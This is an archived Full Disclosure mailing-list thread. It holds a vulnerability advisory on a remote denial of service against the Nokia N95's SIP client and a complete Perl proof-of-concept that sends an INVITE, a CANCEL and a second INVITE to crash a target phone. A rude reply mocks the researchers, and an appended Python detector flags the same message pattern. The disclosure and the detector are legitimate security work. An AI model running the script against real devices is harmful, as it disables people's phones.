Full Disclosure
mailing list archives
Re: Nokia N95 cellphone remote DoS using the SIP Stack
From: reepex <reepex () gmail com>
Date: Wed, 5 Dec 2007 13:21:06 -0600
So, almighty PhD, what is your thesis exactly?
To me it seems to be 'how to run a fuzzer, then write crappy Perl scripts
to exploit DoS conditions'.
Does this properly summarize your PhD credentials?
I guess you could tack on 'after writing the crappy scripts, flood mailing
lists with our crap, and get made fun of'.
I am sure you will serve the academic community greatly one day when you teach
"hacking" classes revolving around the latest editions of Hacking Exposed.
On Dec 5, 2007 11:05 AM, Radu State <State () loria fr> wrote:
Nokia N95 cellphone remote DoS using the SIP Stack
Severity:
High – Denial of Service
Hardware:
Nokia N95
Firmware:
Tested version: Nokia RM-159 V 12.0.013
Notification:
Vulnerability found: 11 September 2007
Contact Nokia Support: 12 September 2007 / No reply
Contact Nokia Security Support: 19 September 2007 / No reply
Vulnerability Synopsis:
If the device has the SIP Phone client activated, a sequence of SIP
messages turns the device into an inconsistent state where the user is not able
to operate it anymore until it reboots.
The sequence of messages consists of 2 different SIP dialogs: the
first initiates an INVITE transaction but immediately closes it (in an
anticipated manner), while the second initiates a normal INVITE
transaction that triggers the vulnerability of the target.
The sequence of messages is illustrated below.
X ------------------------- INVITE -----------------------> Nokiav12
X <---------------------- 100 Trying ---------------------- Nokiav12
X ------------------------- CANCEL -----------------------> Nokiav12
X <----------------- OK (to the Cancel) ------------------- Nokiav12
X <---------------- 487 Request Terminated ---------------- Nokiav12
--------New Dialog--------
X ------------------------- INVITE -----------------------> Nokiav12
X <---------------------- 100 Trying ---------------------- Nokiav12
X <---------------------- 180 Trying ---------------------- Nokiav12
---- The device does not work properly anymore ----
Impact:
A remote entity can take down all the services of the cell phone
Resolution:
As we did not get any proper reply from Nokia about the subject, the best
way will be to disable the SIP client.
Credits:
Humberto J. Abdelnur (Ph.D Student)
Radu State (Ph.D)
Olivier Festor (Ph.D)
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using KiF the Madynes VoIP fuzzer.
http://madynes.loria.fr/
Proof of Concept:
A Perl script (nokiav12.pl) is attached to this mail. Before launching
it, the SIP phone has to be initialised on the target device.
Command:
perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
E.g. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu
#!/usr/bin/perl
##################################################
# Vulnerability discovered using KiF ~ Kiph      #
#                                                #
# Authors:                                       #
#   Humberto J. Abdelnur (Ph.D Student)          #
#   Radu State (Ph.D)                            #
#   Olivier Festor (Ph.D)                        #
#                                                #
# Madynes Team, LORIA - INRIA Lorraine           #
# http://madynes.loria.fr                        #
##################################################
use strict;
use warnings;
use IO::Socket::INET;
use String::Random;

die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>\n"
    unless ($ARGV[3]);

my $targetIP     = $ARGV[0];
my $targetUser   = $ARGV[1];
my $attackerIP   = $ARGV[2];
my $attackerUser = $ARGV[3];

# UDP socket bound to the local SIP port, peered with the target's SIP port
my $socket = IO::Socket::INET->new(
    Proto     => 'udp',
    PeerPort  => 5060,
    PeerAddr  => $targetIP,
    LocalPort => 5060) or die "Cannot create socket: $@\n";

my $foo    = String::Random->new;
my $callid = $foo->randpattern("CCccnCn");
my $cseq   = $foo->randregex('\d\d\d\d');

# SDP offer carried by both INVITEs (the "\r" before each line break yields CRLF)
my $sdp = "v=0\r
o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
s=-\r
c=IN IP4 $attackerIP\r
t=0 0\r
m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
a=sendrecv\r
a=ptime:20\r
a=maxptime:200\r
a=fmtp:96 mode-change-neighbor=1\r
a=fmtp:18 annexb=no\r
a=fmtp:98 0-15\r
a=rtpmap:96 AMR/8000/1\r
a=rtpmap:0 PCMU/8000/1\r
a=rtpmap:8 PCMA/8000/1\r
a=rtpmap:97 iLBC/8000/1\r
a=rtpmap:18 G729/8000/1\r
a=rtpmap:98 telephone-event/8000/1\r
a=rtpmap:13 CN/8000/1\r
";
my $sdplen = length $sdp;

# First dialog: INVITE, wait for the 100 Trying, then CANCEL it immediately
my $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>\r
Call-ID: $callid\@$attackerIP\r
CSeq: $cseq INVITE\r
Max-Forwards: 70\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);

my $text = '';
while (not $text =~ /^SIP\/2\.0 100/) {
    $socket->recv($text, 1024, 0);
}

$msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>;tag=1\r
Call-ID: $callid\@$attackerIP\r
CSeq: $cseq CANCEL\r
Max-Forwards: 70\r
Content-Length: 0\r
\r
";
$socket->send($msg);
sleep(1);    # the original posting had Python's "time.sleep(1)" here

# Second dialog: a fresh, normal INVITE with new Call-ID and CSeq
$callid = $foo->randpattern("CCccnCn");
$cseq   = $foo->randregex('\d\d\d\d');
$msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
From: <sip:$attackerUser\@$attackerIP>;tag=2\r
To: <sip:$targetUser\@$targetIP>\r
Call-ID: $callid\@$attackerIP\r
CSeq: $cseq INVITE\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Max-Forwards: 70\r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
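A defender-side check for the two-dialog pattern the advisory describes, written here as an added example (not the Madynes team's code or part of the PoC): it parses SIP start lines and headers from a constructed capture and flags a caller that CANCELs its own INVITE and then opens a new INVITE dialog to the same URI within a short window, which a SIP-aware monitor or session border controller could alert on or rate-limit. The timestamps, addresses and Call-IDs in SAMPLE are constructed.

```python
import re
from collections import defaultdict

def parse_sip(raw):
    """Return start-line fields plus a lower-cased header dict for one SIP message."""
    head = raw.split("\r\n\r\n", 1)[0]
    start, *lines = head.split("\r\n")
    hdrs = {}
    for line in lines:
        name, _, value = line.partition(":")
        hdrs[name.strip().lower()] = value.strip()
    m = re.match(r"^([A-Z]+) (\S+) SIP/2\.0$", start)
    if m:  # request line: method and Request-URI
        return {"method": m.group(1), "uri": m.group(2), "hdrs": hdrs}
    return {"method": None, "status": int(start.split()[1]), "hdrs": hdrs}

def find_cancel_reinvite(packets, window=5.0):
    """packets: (time, src_ip, raw_message). Report (src, uri, t_cancel, t_reinvite) when a
    source CANCELs its own INVITE and re-INVITEs the same URI within `window` seconds."""
    dialogs = {}                    # Call-ID -> (src, uri) of the opening INVITE
    cancelled = defaultdict(list)   # (src, uri) -> times that source cancelled a dialog
    hits = []
    for t, src, raw in packets:
        msg = parse_sip(raw)
        if msg["method"] is None:   # responses add no state for this check
            continue
        key, cid = (src, msg["uri"]), msg["hdrs"].get("call-id")
        if msg["method"] == "INVITE" and cid not in dialogs:
            dialogs[cid] = key
            if any(0 <= t - tc <= window for tc in cancelled[key]):
                hits.append((src, msg["uri"], cancelled[key][-1], t))
        elif msg["method"] == "CANCEL" and dialogs.get(cid) == key:
            cancelled[key].append(t)
    return hits

def sip(start, **h):
    """Build a minimal SIP message; '_' in a header name stands for '-'."""
    body = "".join(f"{k.replace('_', '-')}: {v}\r\n" for k, v in h.items())
    return f"{start}\r\n{body}\r\n"

T = "sip:lupilu@192.168.1.119"   # constructed target URI, matching the advisory's example
SAMPLE = [  # constructed capture mirroring the advisory's INVITE / CANCEL / new INVITE flow
    (0.00, "192.168.1.2", sip(f"INVITE {T} SIP/2.0", Call_ID="abc1@192.168.1.2", CSeq="1 INVITE")),
    (0.02, "192.168.1.119", sip("SIP/2.0 100 Trying", Call_ID="abc1@192.168.1.2", CSeq="1 INVITE")),
    (0.05, "192.168.1.2", sip(f"CANCEL {T} SIP/2.0", Call_ID="abc1@192.168.1.2", CSeq="1 CANCEL")),
    (1.10, "192.168.1.2", sip(f"INVITE {T} SIP/2.0", Call_ID="xyz2@192.168.1.2", CSeq="2 INVITE")),
    (9.00, "192.168.1.7", sip(f"INVITE {T} SIP/2.0", Call_ID="q9@192.168.1.7", CSeq="1 INVITE")),  # benign
    (9.50, "192.168.1.7", sip(f"CANCEL {T} SIP/2.0", Call_ID="q9@192.168.1.7", CSeq="1 CANCEL")),  # hangs up
]
```

Tune `window` to the local call-setup timing; the benign caller at the end cancels once and never calls back, so it is not reported.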